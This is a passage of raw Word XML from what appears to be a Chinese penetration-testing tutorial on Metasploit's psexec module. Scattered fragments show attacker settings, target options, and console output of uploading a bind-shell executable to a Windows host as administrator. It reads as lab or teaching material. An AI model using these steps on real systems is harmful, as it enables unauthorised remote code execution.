4826,12811,4826,12816,4826,12821,4826,12826,4826,12831,4826,12836,4826,12841,4826,12847,4826,12852,4826,12858,4826,12864,4826,12870,4826,12876,4826,12882,4826,12888,4826,12894,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4826,12901,4825,12901,4825,12901,4825,12901,4825,12901,4825,12901,4825,12901,4825,12901,4824,12900,4824,12901,4824,12900,4824,12901,4823,12900,4823,12901,4823,12900,4823,12901,4822,12900,4822,12901,4822,12900,4821,12901,4821,12900,4820,12901,4820,12900,4819,12901,4819,12900,4819,12901,4818,12900,4818,12901,4817,12900,4816,12901,4816,12900,4815,12901,4815,12900,4814,12901,4813,12900,4813,12901,4812,12900,4811,12901,4810,12901,4809,12901,4809,12901,4808,12901,4807,12901,4806,12901,4805,12901,4804,12901,4803,12901,4802,12901,4801,12901,4800,12901,4799,12901,4798,12901,4796,12901,4795,12901,4794,12901,4793,12901,4791,12901,4790,12901,4789,12901,4787,12901,4786,12901,4784,12901,4783,12901,4781,12901,4780,12901,4778,12901,4776,12901,4774,12901,4773,12901,4771,12901,4769,12901,4767,12901,4765,12901,4763,12901,4761,12901,4759,12901,4757,12901,4755,12901,4753,12901,4751,12901,4749,12901,4746,12901,4744,12901,4742,12901,4739,12901,4737,12901,4734,12901,4732,12901,4729,12901,4726,12901,4724,12901,4721,12901,4718,12901,4715,12901,4712,12901,4709,12901,4706,12901,4706,12901,4706,12901,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12900,4706,12899,4706,12899,4706,12899,4706,12899,4706,12899,4706,12898,4706,12898,4706,12898,4706,12898,4706,12897,4706,12897,4706,12896,4706,12896,4706,12896,4706,12895,4706,12895,4706,12894,4706,12893,4706,12893,4706,12892,4706,12892,4706,12891,4706,12890,4706,12889,4706,12888,4706,12888,4706,12887,4706,12886,4706,12885,4706,12884,4706,12883,4706,12882,4706,12880,4706,12879,4706,12878,4706,12877,4706,12875,4706,12874,4706,12872,4706,12871,4706,12869,4706,12868,4706,12866,4706,12864,4706,12863,4706,12861,4706,12859,4706,12857,4706,12855,4706,12853,4706,12851,4706,12849,4706,12846,4706,12844,4706,12842,4706,12839,4706,12837,4706,12834,4706,12831,4706,12829,4706,12826,4706,12823,4706,12820,4706,12817,4706,12814,4706,12811,4706,12808,4706,12804,4706,12801,4706,12797,4706,12794,4706,12790,4706,12786,4706,12783,4706,12779,4706,12775,4706,12771,4706,12767,4706,12762,4706,12758,4706,12754,4706,12749,4706,12745,4706,12740,4706,12735,4706,12730,4706,12725,4706,12720,4706,12715,4706,12710,4706,12704,4706,12699,4706,12693,4706,12688,4706,12682,4706,12676,4706,12670,4706,12664,4706,12658,4706,12652,4706,1264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7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同样可以配合target的改变来解决控制管理器的强制命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接收。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攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>击机设置：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43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psexec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targets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791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targets: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Automatic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PowerShell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Native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upload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MOF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upload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psexec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2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2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8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psexec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Authenticating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as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'a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dministrator'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Uploading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kKwZpPRs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custom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www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html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bin_tcp_x86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_53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exe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RHOST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will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ignored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>!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Created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\kKwZpPRs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Unable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remove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service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ERROR_CODE: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failed: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RubySMB::Error::UnexpectedStat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usCode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STATUS_PIPE_EMPTY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completed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but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was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created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117.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:226.800pt;width:266.399pt;height:95.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId21" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:433.200pt;width:7.200pt;height:7.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标机：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在执行payloa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d即可。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